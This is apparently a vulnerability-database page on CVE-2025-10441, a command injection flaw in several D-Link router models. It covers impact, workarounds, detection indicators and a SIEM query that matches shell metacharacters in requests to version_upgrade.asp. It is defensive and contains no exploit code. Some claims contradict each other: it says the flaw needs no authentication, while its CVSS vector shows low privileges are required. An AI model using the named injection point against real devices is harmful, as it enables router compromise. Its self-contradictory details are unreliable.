CVE-2025-10441 – This CVE describes an OS command injection vuln... (How to Fix)

Q: What is the severity of CVE-2025-10441?

CVE-2025-10441 has a CVSS score of 6.3 (MEDIUM). This CVE describes an OS command injection vulnerability in D-Link routers' web interface. Attackers can execute arbitrary commands remotely by manipulating the 'path' parameter in the version_upgrade.asp file. Organizations using affected D-Link router models are vulnerable to potential compromise.

📋 TL;DR

This CVE describes an OS command injection vulnerability in D-Link routers' web interface. Attackers can execute arbitrary commands remotely by manipulating the 'path' parameter in the version_upgrade.asp file. Organizations using affected D-Link router models are vulnerable to potential compromise.

💻 Affected Systems

Products:

D-Link DI-8100G
D-Link DI-8200G
D-Link DI-8003G

Versions: 17.12.20A1, 19.12.10A1

Operating Systems: Embedded Linux/Proprietary Router OS

Default Config Vulnerable: ⚠️ Yes

Notes: Affects the jhttpd component's web interface. Default configurations are vulnerable.

⚠️ Manual Verification Required

This CVE does not have specific version information in our database, so automatic vulnerability detection cannot determine if your system is affected.

Why? The CVE database entry doesn't specify which versions are vulnerable (no version ranges provided by the vendor/NVD).

🔒 Custom verification scripts are available for registered users. Sign up free to download automated test scripts.

Recommended Actions:

Review the CVE details at NVD
Check vendor security advisories for your specific version
Test if the vulnerability is exploitable in your environment
Consider updating to the latest version as a precaution

⚠️ Risk & Real-World Impact

🔴

Worst Case

Full system compromise allowing attacker to execute arbitrary commands, install malware, pivot to internal networks, and maintain persistent access.

🟠

Likely Case

Router compromise leading to network traffic interception, credential theft, and deployment of additional payloads.

🟢

If Mitigated

Limited impact with proper network segmentation and access controls preventing lateral movement.

🌐 Internet-Facing: HIGH - Attackers can exploit remotely without authentication on internet-exposed devices.

🏢 Internal Only: MEDIUM - Internal attackers could exploit if they gain network access, but requires specific targeting.

🎯 Exploit Status

Public PoC: ⚠️ Yes

Weaponized: UNKNOWN

Unauthenticated Exploit: ⚠️ Yes

Complexity: LOW

Public exploit available on GitHub. Remote exploitation without authentication is possible.

🛠️ Fix & Mitigation

✅ Official Fix

Patch Version: UNKNOWN

Vendor Advisory: NOT AVAILABLE

Restart Required: No

Instructions:

Check D-Link security advisories for firmware updates. No specific patch version identified in available references.

🔧 Temporary Workarounds

Disable Web Interface

all

Disable the vulnerable web interface component if not required for operations

Router-specific configuration commands to disable web management interface

Network Segmentation

all

Isolate affected routers in separate network segments with strict firewall rules

🧯 If You Can't Patch

Implement strict network access controls to limit exposure to trusted IPs only
Monitor for suspicious command execution attempts and network traffic anomalies

🔍 How to Verify

Check if Vulnerable:

Check router firmware version via web interface or CLI. If running affected versions, device is vulnerable.

Check Version:

Check via web interface at System Status or use CLI command specific to router model

Verify Fix Applied:

Verify firmware has been updated to a version not listed in affected versions. Test web interface functionality.

📡 Detection & Monitoring

Log Indicators:

Unusual command execution in system logs
Multiple failed upgrade attempts
Suspicious web requests to version_upgrade.asp

Network Indicators:

Unexpected outbound connections from router
Traffic patterns indicating command and control

SIEM Query:

source="router_logs" AND (uri="*version_upgrade.asp*" OR command="*;*" OR command="*|*" OR command="*`*")

📊 Metadata

CVE ID: CVE-2025-10441

CVSS v3 Score: 6.3 (MEDIUM)

CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:L

CWE: CWE-77

EPSS Score: 0.26% exploit probability (49.2th percentile)

Published: September 15, 2025

Last Updated: September 15, 2025

🔗 References

📤 Share & Export

📄 Export Markdown 📋 Export JSON

🔗 Related Vulnerabilities

If you're affected by CVE-2025-10441, you might also want to check these: